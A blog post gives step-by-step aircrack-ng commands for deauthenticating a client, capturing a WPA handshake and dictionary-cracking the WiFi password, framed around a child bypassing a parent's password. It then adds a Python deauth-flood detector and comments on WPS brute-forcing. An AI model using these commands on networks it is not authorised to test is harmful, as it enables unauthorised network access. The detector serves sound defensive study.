I haven’t really done a technical walkthrough type video and I now remember why I never did. These things are hard to do and involve two of my least favourite elements of video-making, screen captures and voiceovers. Which is why I always tip my hat to Vivek and his great tutorials over at SecurityTube.net
The idea behind this video was one of those posts on Facebook where a ‘clever’ parent changes the WiFi password and blackmails the child into first doing homework and chores before being able to access the net.
In the video, I kind of glossed over some steps and was a bit quick, so for completeness here are the commands you need once you get Kali up and running and have an injection-capable wireless adapter.
1. airmon-ng (will list all wireless cards)
2. airmon-ng start wlan0 (or whatever your wireless card is – it will start monitor mode; mine was mon0)
3. airodump-ng mon0
4. Ctrl+C (once you see the network you want to connect to)
5. airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/Catch mon0 (replace channel and bssid accordingly)
6. Open a second terminal window
7. aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
8. You should see the message that you’ve captured the handshake, so hit Ctrl+C
9. aircrack-ng -a2 -b [router bssid] -w [path to dictionary] /root/Desktop/*.cap
10. That’s it – you should have captured the password, if it’s in the dictionary you downloaded.
Like any security testing, I need not remind you that these kinds of tests should only be done on equipment you own or have permission to test.
Now, in reality, pulling something like this off isn’t very difficult. In under a dozen commands you can potentially grab a WiFi password, which is script kiddie territory. The real question goes a lot deeper: what can be done with this information? What other information is within the .cap file? Can this be automated and chained? How can this scenario be run in different ways from an attacker’s perspective – and also how can you use this knowledge to build better defences?
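On the defensive side, one thing this knowledge buys you is detection: step 7 above only works by flooding the air with deauthentication frames, and that flood is easy to spot in a monitor-mode capture. The detector below is an added example, not code from the original post; it runs over constructed frame records, and the MAC addresses, timestamps and the burst threshold are assumptions.

```python
from collections import defaultdict, deque

# Constructed sample frames for this example: (timestamp_s, type, subtype, src, dst).
# In 802.11, management frames are type 0; subtype 12 is Deauthentication and
# subtype 10 is Disassociation. A real deployment would pull these fields from a
# monitor-mode capture (for instance the .cap written by airodump-ng) via a pcap library.
AP = "AA:BB:CC:00:00:01"      # constructed router BSSID
CLIENT = "DE:AD:BE:EF:00:02"  # constructed client MAC
SAMPLE_FRAMES = (
    [(0.00, 0, 8, AP, "FF:FF:FF:FF:FF:FF")]                          # beacon, benign
    + [(0.20 + i * 0.05, 2, 0, CLIENT, AP) for i in range(5)]        # data, benign
    + [(3.00, 0, 12, AP, CLIENT)]                                    # one deauth: normal roaming
    + [(10.0 + i * 0.002, 0, 12, AP, CLIENT) for i in range(64)]     # flood towards the client
    + [(10.001 + i * 0.002, 0, 12, CLIENT, AP) for i in range(64)]   # flood towards the AP
)

DEAUTH_SUBTYPES = {10, 12}

def detect_deauth_bursts(frames, window_s=1.0, threshold=8):
    """Return one alert per (src, dst) pair that sends at least `threshold`
    deauth/disassoc frames inside any sliding window of `window_s` seconds.
    The flood is sent with the AP's BSSID spoofed as the source, so `src`
    names the impersonated station, not the attacker's own hardware."""
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerted = set()
    alerts = []
    for ts, ftype, subtype, src, dst in sorted(frames):
        if ftype != 0 or subtype not in DEAUTH_SUBTYPES:
            continue
        key = (src, dst)
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window_s:   # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": src, "dst": dst, "count": len(q),
                           "first_seen": q[0], "last_seen": ts})
    return alerts

if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth flood: {a['src']} -> {a['dst']} "
              f"({a['count']} frames in {a['last_seen'] - a['first_seen']:.3f}s)")
```

The single deauth at 3.0 s (what a client roaming away looks like) is ignored, while both directions of the flood trip the threshold; tune `window_s` and `threshold` to the noise level of your own airspace.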
Yes, it’s an infeasible attack. I would rather go for a WPS brute-force attack, because it has success after a few hours. Also there is something being researched called Offline WPS Bruteforce attack; that would make brute-forcing a little faster.
It’s not a new thing for sure – but old is subject to when one was introduced to the material.
And no, BackTrack 5 was the old version and Kali is the new one… effectively Kali is backtrack 6.
A little old information, no? Also, isn’t it now called BackTrack 5 and not Kali? That being said, the default WiFi password that comes with many routers won’t be in a dictionary. The best method (also the hardest to accomplish compared to Script Kiddie material) is to use a dictionary attack and a brute-force if that does not work, as well as to use GPUs to process the brute-forcing if required.